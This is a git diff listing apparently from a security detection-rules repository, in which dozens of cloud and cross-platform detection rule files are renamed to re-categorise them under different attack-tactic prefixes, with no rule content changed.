rules_building_block/{execution_github_repo_interaction_from_new_ip.toml => collection_github_repo_interaction_from_new_ip.toml} (100%) rename rules_building_block/{discovery_capnetraw_capability.toml => credential_access_capnetraw_capability.toml} (100%) rename rules_building_block/{initial_access_okta_admin_console_login_failure.toml => credential_access_okta_admin_console_login_failure.toml} (100%) rename rules_building_block/{command_and_control_bitsadmin_activity.toml => 
defense_evasion_bitsadmin_activity.toml} (100%) rename rules_building_block/{initial_access_github_new_ip_address_for_pat.toml => defense_evasion_github_new_ip_address_for_pat.toml} (100%) rename rules_building_block/{persistence_github_new_pat_for_user.toml => defense_evasion_github_new_pat_for_user.toml} (100%) rename rules_building_block/{discovery_linux_sysctl_enumeration.toml => defense_evasion_linux_sysctl_enumeration.toml} (100%) rename rules_building_block/{credential_access_mdmp_file_unusual_extension.toml => defense_evasion_mdmp_file_unusual_extension.toml} (100%) rename rules_building_block/{execution_settingcontent_ms_file_creation.toml => defense_evasion_settingcontent_ms_file_creation.toml} (100%) rename rules_building_block/{privilege_escalation_sts_getsessiontoken_abuse.toml => defense_evasion_sts_getsessiontoken_abuse.toml} (100%) rename rules_building_block/{initial_access_anomalous_rsc_flight_data_patterns.toml => execution_anomalous_rsc_flight_data_patterns.toml} (100%) rename rules_building_block/{lateral_movement_at.toml => execution_at.toml} (100%) rename rules_building_block/{defense_evasion_download_susp_extension.toml => execution_download_susp_extension.toml} (100%) rename rules_building_block/{defense_evasion_injection_from_msoffice.toml => execution_injection_from_msoffice.toml} (100%) rename rules_building_block/{defense_evasion_outlook_suspicious_child.toml => execution_outlook_suspicious_child.toml} (100%) rename rules_building_block/{lateral_movement_posh_winrm_activity.toml => execution_posh_winrm_activity.toml} (100%) rename rules_building_block/{lateral_movement_unusual_process_sql_accounts.toml => execution_unusual_process_sql_accounts.toml} (100%) rename rules_building_block/{lateral_movement_wmic_remote.toml => execution_wmic_remote.toml} (100%) rename rules_building_block/{credential_access_entra_id_risk_detection_signal.toml => initial_access_entra_id_risk_detection_signal.toml} (100%) rename 
rules_building_block/{persistence_web_server_potential_sql_injection.toml => initial_access_web_server_potential_sql_injection.toml} (100%) rename rules_building_block/{execution_github_new_event_action_for_pat.toml => persistence_github_new_event_action_for_pat.toml} (100%) rename rules_building_block/{discovery_linux_modprobe_enumeration.toml => persistence_linux_modprobe_enumeration.toml} (100%) rename rules_building_block/{defense_evasion_service_path_registry.toml => persistence_service_path_registry.toml} (100%) rename rules_building_block/{defense_evasion_services_exe_path.toml => persistence_services_exe_path.toml} (100%) rename rules_building_block/{defense_evasion_write_dac_access.toml => persistence_write_dac_access.toml} (100%) rename rules_building_block/{execution_github_repo_created.toml => resource_development_github_repo_created.toml} (100%) diff --git a/rules/cross-platform/initial_access_azure_o365_with_network_alert.toml b/rules/cross-platform/collection_azure_o365_with_network_alert.toml similarity index 100% rename from rules/cross-platform/initial_access_azure_o365_with_network_alert.toml rename to rules/cross-platform/collection_azure_o365_with_network_alert.toml diff --git a/rules/cross-platform/defense_evasion_genai_process_encoding_prior_to_network_activity.toml b/rules/cross-platform/collection_genai_process_encoding_prior_to_network_activity.toml similarity index 100% rename from rules/cross-platform/defense_evasion_genai_process_encoding_prior_to_network_activity.toml rename to rules/cross-platform/collection_genai_process_encoding_prior_to_network_activity.toml diff --git a/rules/cross-platform/discovery_virtual_machine_fingerprinting_grep.toml b/rules/cross-platform/defense_evasion_virtual_machine_fingerprinting_grep.toml similarity index 100% rename from rules/cross-platform/discovery_virtual_machine_fingerprinting_grep.toml rename to rules/cross-platform/defense_evasion_virtual_machine_fingerprinting_grep.toml 
diff --git a/rules/cross-platform/persistence_web_server_potential_command_injection.toml b/rules/cross-platform/initial_access_web_server_potential_command_injection.toml similarity index 100% rename from rules/cross-platform/persistence_web_server_potential_command_injection.toml rename to rules/cross-platform/initial_access_web_server_potential_command_injection.toml diff --git a/rules/cross-platform/defense_evasion_genai_config_modification.toml b/rules/cross-platform/persistence_genai_config_modification.toml similarity index 100% rename from rules/cross-platform/defense_evasion_genai_config_modification.toml rename to rules/cross-platform/persistence_genai_config_modification.toml diff --git a/rules/cross-platform/privilege_escalation_trap_execution.toml b/rules/cross-platform/persistence_trap_execution.toml similarity index 100% rename from rules/cross-platform/privilege_escalation_trap_execution.toml rename to rules/cross-platform/persistence_trap_execution.toml diff --git a/rules/cross-platform/defense_evasion_genai_process_compiling_executables.toml b/rules/cross-platform/resource_development_genai_process_compiling_executables.toml similarity index 100% rename from rules/cross-platform/defense_evasion_genai_process_compiling_executables.toml rename to rules/cross-platform/resource_development_genai_process_compiling_executables.toml diff --git a/rules/integrations/aws/exfiltration_dynamodb_scan_by_unusual_user.toml b/rules/integrations/aws/collection_dynamodb_scan_by_unusual_user.toml similarity index 100% rename from rules/integrations/aws/exfiltration_dynamodb_scan_by_unusual_user.toml rename to rules/integrations/aws/collection_dynamodb_scan_by_unusual_user.toml 
diff --git a/rules/integrations/aws/defense_evasion_rds_instance_restored.toml b/rules/integrations/aws/collection_rds_instance_restored.toml similarity index 100% rename from rules/integrations/aws/defense_evasion_rds_instance_restored.toml rename to rules/integrations/aws/collection_rds_instance_restored.toml diff --git a/rules/integrations/aws/exfiltration_rds_snapshot_export.toml b/rules/integrations/aws/collection_rds_snapshot_export.toml similarity index 100% rename from rules/integrations/aws/exfiltration_rds_snapshot_export.toml rename to rules/integrations/aws/collection_rds_snapshot_export.toml diff --git a/rules/integrations/aws/impact_aws_eventbridge_rule_disabled_or_deleted.toml b/rules/integrations/aws/defense_evasion_aws_eventbridge_rule_disabled_or_deleted.toml similarity index 100% rename from rules/integrations/aws/impact_aws_eventbridge_rule_disabled_or_deleted.toml rename to rules/integrations/aws/defense_evasion_aws_eventbridge_rule_disabled_or_deleted.toml diff --git a/rules/integrations/aws/collection_cloudtrail_logging_created.toml b/rules/integrations/aws/defense_evasion_cloudtrail_logging_created.toml similarity index 100% rename from rules/integrations/aws/collection_cloudtrail_logging_created.toml rename to rules/integrations/aws/defense_evasion_cloudtrail_logging_created.toml diff --git a/rules/integrations/aws/impact_cloudtrail_logging_updated.toml b/rules/integrations/aws/defense_evasion_cloudtrail_logging_updated.toml similarity index 100% rename from rules/integrations/aws/impact_cloudtrail_logging_updated.toml rename to rules/integrations/aws/defense_evasion_cloudtrail_logging_updated.toml diff --git a/rules/integrations/aws/impact_cloudwatch_log_group_deletion.toml b/rules/integrations/aws/defense_evasion_cloudwatch_log_group_deletion.toml similarity index 100% rename from rules/integrations/aws/impact_cloudwatch_log_group_deletion.toml rename to rules/integrations/aws/defense_evasion_cloudwatch_log_group_deletion.toml 
diff --git a/rules/integrations/aws/impact_cloudwatch_log_stream_deletion.toml b/rules/integrations/aws/defense_evasion_cloudwatch_log_stream_deletion.toml
similarity index 100%
rename from rules/integrations/aws/impact_cloudwatch_log_stream_deletion.toml
rename to rules/integrations/aws/defense_evasion_cloudwatch_log_stream_deletion.toml
diff --git a/rules/integrations/aws/impact_ec2_disable_ebs_encryption.toml b/rules/integrations/aws/defense_evasion_ec2_disable_ebs_encryption.toml
similarity index 100%
rename from rules/integrations/aws/impact_ec2_disable_ebs_encryption.toml
rename to rules/integrations/aws/defense_evasion_ec2_disable_ebs_encryption.toml
diff --git a/rules/integrations/aws/persistence_ec2_network_acl_creation.toml b/rules/integrations/aws/defense_evasion_ec2_network_acl_creation.toml
similarity index 100%
rename from rules/integrations/aws/persistence_ec2_network_acl_creation.toml
rename to rules/integrations/aws/defense_evasion_ec2_network_acl_creation.toml
diff --git a/rules/integrations/aws/persistence_ec2_route_table_modified_or_deleted.toml b/rules/integrations/aws/defense_evasion_ec2_route_table_modified_or_deleted.toml
similarity index 100%
rename from rules/integrations/aws/persistence_ec2_route_table_modified_or_deleted.toml
rename to rules/integrations/aws/defense_evasion_ec2_route_table_modified_or_deleted.toml
diff --git a/rules/integrations/aws/persistence_ec2_security_group_configuration_change_detection.toml b/rules/integrations/aws/defense_evasion_ec2_security_group_configuration_change_detection.toml
similarity index 100%
rename from rules/integrations/aws/persistence_ec2_security_group_configuration_change_detection.toml
rename to rules/integrations/aws/defense_evasion_ec2_security_group_configuration_change_detection.toml
diff --git a/rules/integrations/aws/persistence_iam_api_calls_via_user_session_token.toml b/rules/integrations/aws/defense_evasion_iam_api_calls_via_user_session_token.toml
similarity index 100%
rename from rules/integrations/aws/persistence_iam_api_calls_via_user_session_token.toml
rename to rules/integrations/aws/defense_evasion_iam_api_calls_via_user_session_token.toml
diff --git a/rules/integrations/aws/impact_iam_deactivate_mfa_device.toml b/rules/integrations/aws/defense_evasion_iam_deactivate_mfa_device.toml
similarity index 100%
rename from rules/integrations/aws/impact_iam_deactivate_mfa_device.toml
rename to rules/integrations/aws/defense_evasion_iam_deactivate_mfa_device.toml
diff --git a/rules/integrations/aws/privilege_escalation_iam_saml_provider_updated.toml b/rules/integrations/aws/defense_evasion_iam_saml_provider_updated.toml
similarity index 100%
rename from rules/integrations/aws/privilege_escalation_iam_saml_provider_updated.toml
rename to rules/integrations/aws/defense_evasion_iam_saml_provider_updated.toml
diff --git a/rules/integrations/aws/persistence_lambda_backdoor_invoke_function_for_any_principal.toml b/rules/integrations/aws/defense_evasion_lambda_backdoor_invoke_function_for_any_principal.toml
similarity index 100%
rename from rules/integrations/aws/persistence_lambda_backdoor_invoke_function_for_any_principal.toml
rename to rules/integrations/aws/defense_evasion_lambda_backdoor_invoke_function_for_any_principal.toml
diff --git a/rules/integrations/aws/execution_lambda_external_layer_added_to_function.toml b/rules/integrations/aws/defense_evasion_lambda_external_layer_added_to_function.toml
similarity index 100%
rename from rules/integrations/aws/execution_lambda_external_layer_added_to_function.toml
rename to rules/integrations/aws/defense_evasion_lambda_external_layer_added_to_function.toml
diff --git a/rules/integrations/aws/impact_rds_instance_cluster_deletion_protection_disabled.toml b/rules/integrations/aws/defense_evasion_rds_instance_cluster_deletion_protection_disabled.toml
similarity index 100%
rename from rules/integrations/aws/impact_rds_instance_cluster_deletion_protection_disabled.toml
rename to rules/integrations/aws/defense_evasion_rds_instance_cluster_deletion_protection_disabled.toml
diff --git a/rules/integrations/aws/persistence_rds_instance_made_public.toml b/rules/integrations/aws/defense_evasion_rds_instance_made_public.toml
similarity index 100%
rename from rules/integrations/aws/persistence_rds_instance_made_public.toml
rename to rules/integrations/aws/defense_evasion_rds_instance_made_public.toml
diff --git a/rules/integrations/aws/persistence_route_53_domain_transfer_lock_disabled.toml b/rules/integrations/aws/defense_evasion_route_53_domain_transfer_lock_disabled.toml
similarity index 100%
rename from rules/integrations/aws/persistence_route_53_domain_transfer_lock_disabled.toml
rename to rules/integrations/aws/defense_evasion_route_53_domain_transfer_lock_disabled.toml
diff --git a/rules/integrations/aws/persistence_route_53_hosted_zone_associated_with_a_vpc.toml b/rules/integrations/aws/defense_evasion_route_53_hosted_zone_associated_with_a_vpc.toml
similarity index 100%
rename from rules/integrations/aws/persistence_route_53_hosted_zone_associated_with_a_vpc.toml
rename to rules/integrations/aws/defense_evasion_route_53_hosted_zone_associated_with_a_vpc.toml
diff --git a/rules/integrations/aws/persistence_route_table_created.toml b/rules/integrations/aws/defense_evasion_route_table_created.toml
similarity index 100%
rename from rules/integrations/aws/persistence_route_table_created.toml
rename to rules/integrations/aws/defense_evasion_route_table_created.toml
diff --git a/rules/integrations/aws/exfiltration_s3_bucket_policy_added_for_public_access.toml b/rules/integrations/aws/defense_evasion_s3_bucket_policy_added_for_public_access.toml
similarity index 100%
rename from rules/integrations/aws/exfiltration_s3_bucket_policy_added_for_public_access.toml
rename to rules/integrations/aws/defense_evasion_s3_bucket_policy_added_for_public_access.toml
diff --git a/rules/integrations/aws/impact_aws_s3_bucket_enumeration_or_brute_force.toml b/rules/integrations/aws/discovery_aws_s3_bucket_enumeration_or_brute_force.toml
similarity index 100%
rename from rules/integrations/aws/impact_aws_s3_bucket_enumeration_or_brute_force.toml
rename to rules/integrations/aws/discovery_aws_s3_bucket_enumeration_or_brute_force.toml
diff --git a/rules/integrations/aws/exfiltration_ec2_full_network_packet_capture_detected.toml b/rules/integrations/aws/discovery_ec2_full_network_packet_capture_detected.toml
similarity index 100%
rename from rules/integrations/aws/exfiltration_ec2_full_network_packet_capture_detected.toml
rename to rules/integrations/aws/discovery_ec2_full_network_packet_capture_detected.toml
diff --git a/rules/integrations/aws/lateral_movement_sns_topic_message_publish_by_rare_user.toml b/rules/integrations/aws/exfiltration_sns_topic_message_publish_by_rare_user.toml
similarity index 100%
rename from rules/integrations/aws/lateral_movement_sns_topic_message_publish_by_rare_user.toml
rename to rules/integrations/aws/exfiltration_sns_topic_message_publish_by_rare_user.toml
diff --git a/rules/integrations/aws/defense_evasion_s3_bucket_lifecycle_expiration_added.toml b/rules/integrations/aws/impact_s3_bucket_lifecycle_expiration_added.toml
similarity index 100%
rename from rules/integrations/aws/defense_evasion_s3_bucket_lifecycle_expiration_added.toml
rename to rules/integrations/aws/impact_s3_bucket_lifecycle_expiration_added.toml
diff --git a/rules/integrations/aws/resource_development_sns_topic_created_by_rare_user.toml b/rules/integrations/aws/impact_sns_topic_created_by_rare_user.toml
similarity index 100%
rename from rules/integrations/aws/resource_development_sns_topic_created_by_rare_user.toml
rename to rules/integrations/aws/impact_sns_topic_created_by_rare_user.toml
diff --git a/rules/integrations/aws/defense_evasion_sqs_purge_queue.toml b/rules/integrations/aws/impact_sqs_purge_queue.toml
similarity index 100%
rename from rules/integrations/aws/defense_evasion_sqs_purge_queue.toml
rename to rules/integrations/aws/impact_sqs_purge_queue.toml
diff --git a/rules/integrations/aws/lateral_movement_ec2_instance_console_login.toml b/rules/integrations/aws/initial_access_ec2_instance_console_login.toml
similarity index 100%
rename from rules/integrations/aws/lateral_movement_ec2_instance_console_login.toml
rename to rules/integrations/aws/initial_access_ec2_instance_console_login.toml
diff --git a/rules/integrations/aws/lateral_movement_ec2_instance_connect_ssh_public_key_uploaded.toml b/rules/integrations/aws/persistence_ec2_instance_connect_ssh_public_key_uploaded.toml
similarity index 100%
rename from rules/integrations/aws/lateral_movement_ec2_instance_connect_ssh_public_key_uploaded.toml
rename to rules/integrations/aws/persistence_ec2_instance_connect_ssh_public_key_uploaded.toml
diff --git a/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_group.toml b/rules/integrations/aws/persistence_iam_administratoraccess_policy_attached_to_group.toml
similarity index 100%
rename from rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_group.toml
rename to rules/integrations/aws/persistence_iam_administratoraccess_policy_attached_to_group.toml
diff --git a/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_role.toml b/rules/integrations/aws/persistence_iam_administratoraccess_policy_attached_to_role.toml
similarity index 100%
rename from rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_role.toml
rename to rules/integrations/aws/persistence_iam_administratoraccess_policy_attached_to_role.toml
diff --git a/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_user.toml b/rules/integrations/aws/persistence_iam_administratoraccess_policy_attached_to_user.toml
similarity index 100%
rename from rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_user.toml
rename to rules/integrations/aws/persistence_iam_administratoraccess_policy_attached_to_user.toml
diff --git a/rules/integrations/aws/privilege_escalation_iam_customer_managed_policy_attached_to_role.toml b/rules/integrations/aws/persistence_iam_customer_managed_policy_attached_to_role.toml
similarity index 100%
rename from rules/integrations/aws/privilege_escalation_iam_customer_managed_policy_attached_to_role.toml
rename to rules/integrations/aws/persistence_iam_customer_managed_policy_attached_to_role.toml
diff --git a/rules/integrations/aws/privilege_escalation_iam_update_assume_role_policy.toml b/rules/integrations/aws/persistence_iam_update_assume_role_policy.toml
similarity index 100%
rename from rules/integrations/aws/privilege_escalation_iam_update_assume_role_policy.toml
rename to rules/integrations/aws/persistence_iam_update_assume_role_policy.toml
diff --git a/rules/integrations/aws/credential_access_iam_user_addition_to_group.toml b/rules/integrations/aws/persistence_iam_user_addition_to_group.toml
similarity index 100%
rename from rules/integrations/aws/credential_access_iam_user_addition_to_group.toml
rename to rules/integrations/aws/persistence_iam_user_addition_to_group.toml
diff --git a/rules/integrations/aws/exfiltration_s3_bucket_policy_added_for_external_account_access.toml b/rules/integrations/aws/persistence_s3_bucket_policy_added_for_external_account_access.toml
similarity index 100%
rename from rules/integrations/aws/exfiltration_s3_bucket_policy_added_for_external_account_access.toml
rename to rules/integrations/aws/persistence_s3_bucket_policy_added_for_external_account_access.toml
diff --git a/rules/integrations/aws/defense_evasion_sts_get_federation_token.toml b/rules/integrations/aws/persistence_sts_get_federation_token.toml
similarity index 100%
rename from rules/integrations/aws/defense_evasion_sts_get_federation_token.toml
rename to rules/integrations/aws/persistence_sts_get_federation_token.toml
diff --git a/rules/integrations/aws/privilege_escalation_sts_role_chaining.toml b/rules/integrations/aws/persistence_sts_role_chaining.toml
similarity index 100%
rename from rules/integrations/aws/privilege_escalation_sts_role_chaining.toml
rename to rules/integrations/aws/persistence_sts_role_chaining.toml
diff --git a/rules/integrations/aws/persistence_iam_oidc_provider_created.toml b/rules/integrations/aws/privilege_escalation_iam_oidc_provider_created.toml
similarity index 100%
rename from rules/integrations/aws/persistence_iam_oidc_provider_created.toml
rename to rules/integrations/aws/privilege_escalation_iam_oidc_provider_created.toml
diff --git a/rules/integrations/aws/persistence_route_53_domain_transferred_to_another_account.toml b/rules/integrations/aws/resource_development_route_53_domain_transferred_to_another_account.toml
similarity index 100%
rename from rules/integrations/aws/persistence_route_53_domain_transferred_to_another_account.toml
rename to rules/integrations/aws/resource_development_route_53_domain_transferred_to_another_account.toml
diff --git a/rules/integrations/azure/exfiltration_azure_storage_blob_download_azcopy_sas_token.toml b/rules/integrations/azure/collection_azure_storage_blob_download_azcopy_sas_token.toml
similarity index 100%
rename from rules/integrations/azure/exfiltration_azure_storage_blob_download_azcopy_sas_token.toml
rename to rules/integrations/azure/collection_azure_storage_blob_download_azcopy_sas_token.toml
diff --git a/rules/integrations/azure/credential_access_key_vault_excessive_retrieval.toml b/rules/integrations/azure/collection_key_vault_excessive_retrieval.toml
similarity index 100%
rename from rules/integrations/azure/credential_access_key_vault_excessive_retrieval.toml
rename to rules/integrations/azure/collection_key_vault_excessive_retrieval.toml
diff --git a/rules/integrations/azure/initial_access_azure_arc_cluster_credential_access_unusual_source.toml b/rules/integrations/azure/credential_access_azure_arc_cluster_credential_access_unusual_source.toml
similarity index 100%
rename from rules/integrations/azure/initial_access_azure_arc_cluster_credential_access_unusual_source.toml
rename to rules/integrations/azure/credential_access_azure_arc_cluster_credential_access_unusual_source.toml
diff --git a/rules/integrations/azure/initial_access_entra_id_illicit_consent_grant_via_registered_application.toml b/rules/integrations/azure/credential_access_entra_id_illicit_consent_grant_via_registered_application.toml
similarity index 100%
rename from rules/integrations/azure/initial_access_entra_id_illicit_consent_grant_via_registered_application.toml
rename to rules/integrations/azure/credential_access_entra_id_illicit_consent_grant_via_registered_application.toml
diff --git a/rules/integrations/azure/initial_access_entra_id_oauth_auth_code_grant_unusual_app_resource_user.toml b/rules/integrations/azure/credential_access_entra_id_oauth_auth_code_grant_unusual_app_resource_user.toml
similarity index 100%
rename from rules/integrations/azure/initial_access_entra_id_oauth_auth_code_grant_unusual_app_resource_user.toml
rename to rules/integrations/azure/credential_access_entra_id_oauth_auth_code_grant_unusual_app_resource_user.toml
diff --git a/rules/integrations/azure/initial_access_entra_id_oauth_phishing_via_first_party_microsoft_application.toml b/rules/integrations/azure/credential_access_entra_id_oauth_phishing_via_first_party_microsoft_application.toml
similarity index 100%
rename from rules/integrations/azure/initial_access_entra_id_oauth_phishing_via_first_party_microsoft_application.toml
rename to rules/integrations/azure/credential_access_entra_id_oauth_phishing_via_first_party_microsoft_application.toml
diff --git a/rules/integrations/azure/initial_access_entra_id_protection_sign_in_risk_detected.toml b/rules/integrations/azure/credential_access_entra_id_protection_sign_in_risk_detected.toml
similarity index 100%
rename from rules/integrations/azure/initial_access_entra_id_protection_sign_in_risk_detected.toml
rename to rules/integrations/azure/credential_access_entra_id_protection_sign_in_risk_detected.toml
diff --git a/rules/integrations/azure/initial_access_entra_id_suspicious_oauth_flow_via_auth_broker_to_drs.toml b/rules/integrations/azure/credential_access_entra_id_suspicious_oauth_flow_via_auth_broker_to_drs.toml
similarity index 100%
rename from rules/integrations/azure/initial_access_entra_id_suspicious_oauth_flow_via_auth_broker_to_drs.toml
rename to rules/integrations/azure/credential_access_entra_id_suspicious_oauth_flow_via_auth_broker_to_drs.toml
diff --git a/rules/integrations/azure/discovery_entra_id_teamfiltration_user_agents_detected.toml b/rules/integrations/azure/credential_access_entra_id_teamfiltration_user_agents_detected.toml
similarity index 100%
rename from rules/integrations/azure/discovery_entra_id_teamfiltration_user_agents_detected.toml
rename to rules/integrations/azure/credential_access_entra_id_teamfiltration_user_agents_detected.toml
diff --git a/rules/integrations/azure/persistence_automation_account_created.toml b/rules/integrations/azure/defense_evasion_automation_account_created.toml
similarity index 100%
rename from rules/integrations/azure/persistence_automation_account_created.toml
rename to rules/integrations/azure/defense_evasion_automation_account_created.toml
diff --git a/rules/integrations/azure/initial_access_entra_id_actor_token_user_impersonation_abuse.toml b/rules/integrations/azure/defense_evasion_entra_id_actor_token_user_impersonation_abuse.toml
similarity index 100%
rename from rules/integrations/azure/initial_access_entra_id_actor_token_user_impersonation_abuse.toml
rename to rules/integrations/azure/defense_evasion_entra_id_actor_token_user_impersonation_abuse.toml
diff --git a/rules/integrations/azure/persistence_entra_id_conditional_access_policy_modified.toml b/rules/integrations/azure/defense_evasion_entra_id_conditional_access_policy_modified.toml
similarity index 100%
rename from rules/integrations/azure/persistence_entra_id_conditional_access_policy_modified.toml
rename to rules/integrations/azure/defense_evasion_entra_id_conditional_access_policy_modified.toml
diff --git a/rules/integrations/azure/initial_access_entra_id_device_code_auth_with_broker_client.toml b/rules/integrations/azure/defense_evasion_entra_id_device_code_auth_with_broker_client.toml
similarity index 100%
rename from rules/integrations/azure/initial_access_entra_id_device_code_auth_with_broker_client.toml
rename to rules/integrations/azure/defense_evasion_entra_id_device_code_auth_with_broker_client.toml
diff --git a/rules/integrations/azure/initial_access_entra_id_federated_login_by_unusual_client.toml b/rules/integrations/azure/defense_evasion_entra_id_federated_login_by_unusual_client.toml
similarity index 100%
rename from rules/integrations/azure/initial_access_entra_id_federated_login_by_unusual_client.toml
rename to rules/integrations/azure/defense_evasion_entra_id_federated_login_by_unusual_client.toml
diff --git a/rules/integrations/azure/initial_access_entra_id_graph_single_session_from_multiple_addresses.toml b/rules/integrations/azure/defense_evasion_entra_id_graph_single_session_from_multiple_addresses.toml
similarity index 100%
rename from rules/integrations/azure/initial_access_entra_id_graph_single_session_from_multiple_addresses.toml
rename to rules/integrations/azure/defense_evasion_entra_id_graph_single_session_from_multiple_addresses.toml
diff --git a/rules/integrations/azure/persistence_entra_id_mfa_disabled_for_user.toml b/rules/integrations/azure/defense_evasion_entra_id_mfa_disabled_for_user.toml
similarity index 100%
rename from rules/integrations/azure/persistence_entra_id_mfa_disabled_for_user.toml
rename to rules/integrations/azure/defense_evasion_entra_id_mfa_disabled_for_user.toml
diff --git a/rules/integrations/azure/persistence_entra_id_privileged_identity_management_role_modified.toml b/rules/integrations/azure/defense_evasion_entra_id_privileged_identity_management_role_modified.toml
similarity index 100%
rename from rules/integrations/azure/persistence_entra_id_privileged_identity_management_role_modified.toml
rename to rules/integrations/azure/defense_evasion_entra_id_privileged_identity_management_role_modified.toml
diff --git a/rules/integrations/azure/initial_access_entra_id_rare_app_id_for_principal_auth.toml b/rules/integrations/azure/defense_evasion_entra_id_rare_app_id_for_principal_auth.toml
similarity index 100%
rename from rules/integrations/azure/initial_access_entra_id_rare_app_id_for_principal_auth.toml
rename to rules/integrations/azure/defense_evasion_entra_id_rare_app_id_for_principal_auth.toml
diff --git a/rules/integrations/azure/persistence_entra_id_tenant_domain_federation_via_audit_logs.toml b/rules/integrations/azure/defense_evasion_entra_id_tenant_domain_federation_via_audit_logs.toml
similarity index 100%
rename from rules/integrations/azure/persistence_entra_id_tenant_domain_federation_via_audit_logs.toml
rename to rules/integrations/azure/defense_evasion_entra_id_tenant_domain_federation_via_audit_logs.toml
diff --git a/rules/integrations/azure/persistence_graph_eam_addition_or_modification.toml b/rules/integrations/azure/defense_evasion_graph_eam_addition_or_modification.toml
similarity index 100%
rename from rules/integrations/azure/persistence_graph_eam_addition_or_modification.toml
rename to rules/integrations/azure/defense_evasion_graph_eam_addition_or_modification.toml
diff --git a/rules/integrations/azure/initial_access_graph_first_occurrence_of_client_request.toml b/rules/integrations/azure/defense_evasion_graph_first_occurrence_of_client_request.toml
similarity index 100%
rename from rules/integrations/azure/initial_access_graph_first_occurrence_of_client_request.toml
rename to rules/integrations/azure/defense_evasion_graph_first_occurrence_of_client_request.toml
diff --git a/rules/integrations/azure/discovery_storage_blob_container_access_modification.toml b/rules/integrations/azure/defense_evasion_storage_blob_container_access_modification.toml
similarity index 100%
rename from rules/integrations/azure/discovery_storage_blob_container_access_modification.toml
rename to rules/integrations/azure/defense_evasion_storage_blob_container_access_modification.toml
diff --git a/rules/integrations/azure/persistence_entra_id_user_signed_in_from_unusual_device.toml b/rules/integrations/azure/initial_access_entra_id_user_signed_in_from_unusual_device.toml
similarity index 100%
rename from rules/integrations/azure/persistence_entra_id_user_signed_in_from_unusual_device.toml
rename to rules/integrations/azure/initial_access_entra_id_user_signed_in_from_unusual_device.toml
diff --git a/rules/integrations/azure/privilege_escalation_azure_rbac_administrator_roles_assigned.toml b/rules/integrations/azure/persistence_azure_rbac_administrator_roles_assigned.toml
similarity index 100%
rename from rules/integrations/azure/privilege_escalation_azure_rbac_administrator_roles_assigned.toml
rename to rules/integrations/azure/persistence_azure_rbac_administrator_roles_assigned.toml
diff --git a/rules/integrations/azure/privilege_escalation_entra_id_elevate_to_user_administrator_access.toml b/rules/integrations/azure/persistence_entra_id_elevate_to_user_administrator_access.toml
similarity index 100%
rename from rules/integrations/azure/privilege_escalation_entra_id_elevate_to_user_administrator_access.toml
rename to rules/integrations/azure/persistence_entra_id_elevate_to_user_administrator_access.toml
diff --git a/rules/integrations/azure/initial_access_entra_id_external_guest_user_invite.toml b/rules/integrations/azure/persistence_entra_id_external_guest_user_invite.toml
similarity index 100%
rename from rules/integrations/azure/initial_access_entra_id_external_guest_user_invite.toml
rename to rules/integrations/azure/persistence_entra_id_external_guest_user_invite.toml
diff --git a/rules/integrations/azure/privilege_escalation_kubernetes_aks_rolebinding_created.toml b/rules/integrations/azure/persistence_kubernetes_aks_rolebinding_created.toml
similarity index 100%
rename from rules/integrations/azure/privilege_escalation_kubernetes_aks_rolebinding_created.toml
rename to rules/integrations/azure/persistence_kubernetes_aks_rolebinding_created.toml
diff --git a/rules/integrations/azure/credential_access_storage_account_key_regenerated.toml b/rules/integrations/azure/persistence_storage_account_key_regenerated.toml
similarity index 100%
rename from rules/integrations/azure/credential_access_storage_account_key_regenerated.toml
rename to rules/integrations/azure/persistence_storage_account_key_regenerated.toml
diff --git a/rules/integrations/ded/exfiltration_ml_high_bytes_destination_port.toml b/rules/integrations/ded/command_and_control_ml_high_bytes_destination_port.toml
similarity index 100%
rename from rules/integrations/ded/exfiltration_ml_high_bytes_destination_port.toml
rename to rules/integrations/ded/command_and_control_ml_high_bytes_destination_port.toml
diff --git a/rules/integrations/gcp/exfiltration_gcp_logging_sink_modification.toml b/rules/integrations/gcp/defense_evasion_gcp_logging_sink_modification.toml
similarity index 100%
rename from rules/integrations/gcp/exfiltration_gcp_logging_sink_modification.toml
rename to rules/integrations/gcp/defense_evasion_gcp_logging_sink_modification.toml
diff --git a/rules/integrations/gcp/persistence_gcp_iam_service_account_key_deletion.toml b/rules/integrations/gcp/impact_gcp_iam_service_account_key_deletion.toml
similarity index 100%
rename from rules/integrations/gcp/persistence_gcp_iam_service_account_key_deletion.toml
rename to rules/integrations/gcp/impact_gcp_iam_service_account_key_deletion.toml
diff --git a/rules/integrations/gcp/defense_evasion_gcp_pub_sub_subscription_deletion.toml b/rules/integrations/gcp/impact_gcp_pub_sub_subscription_deletion.toml
similarity index 100%
rename from rules/integrations/gcp/defense_evasion_gcp_pub_sub_subscription_deletion.toml
rename to rules/integrations/gcp/impact_gcp_pub_sub_subscription_deletion.toml
diff --git a/rules/integrations/gcp/defense_evasion_gcp_pub_sub_topic_deletion.toml b/rules/integrations/gcp/impact_gcp_pub_sub_topic_deletion.toml
similarity index 100%
rename from rules/integrations/gcp/defense_evasion_gcp_pub_sub_topic_deletion.toml
rename to rules/integrations/gcp/impact_gcp_pub_sub_topic_deletion.toml
diff --git a/rules/integrations/gcp/defense_evasion_gcp_virtual_private_cloud_network_deleted.toml b/rules/integrations/gcp/impact_gcp_virtual_private_cloud_network_deleted.toml
similarity index 100%
rename from rules/integrations/gcp/defense_evasion_gcp_virtual_private_cloud_network_deleted.toml
rename to rules/integrations/gcp/impact_gcp_virtual_private_cloud_network_deleted.toml
diff --git a/rules/integrations/gcp/initial_access_gcp_iam_custom_role_creation.toml b/rules/integrations/gcp/persistence_gcp_iam_custom_role_creation.toml
similarity index 100%
rename from rules/integrations/gcp/initial_access_gcp_iam_custom_role_creation.toml
rename to rules/integrations/gcp/persistence_gcp_iam_custom_role_creation.toml
diff --git a/rules/integrations/gcp/defense_evasion_gcp_storage_bucket_permissions_modified.toml b/rules/integrations/gcp/persistence_gcp_storage_bucket_permissions_modified.toml
similarity index 100%
rename from rules/integrations/gcp/defense_evasion_gcp_storage_bucket_permissions_modified.toml
rename to rules/integrations/gcp/persistence_gcp_storage_bucket_permissions_modified.toml
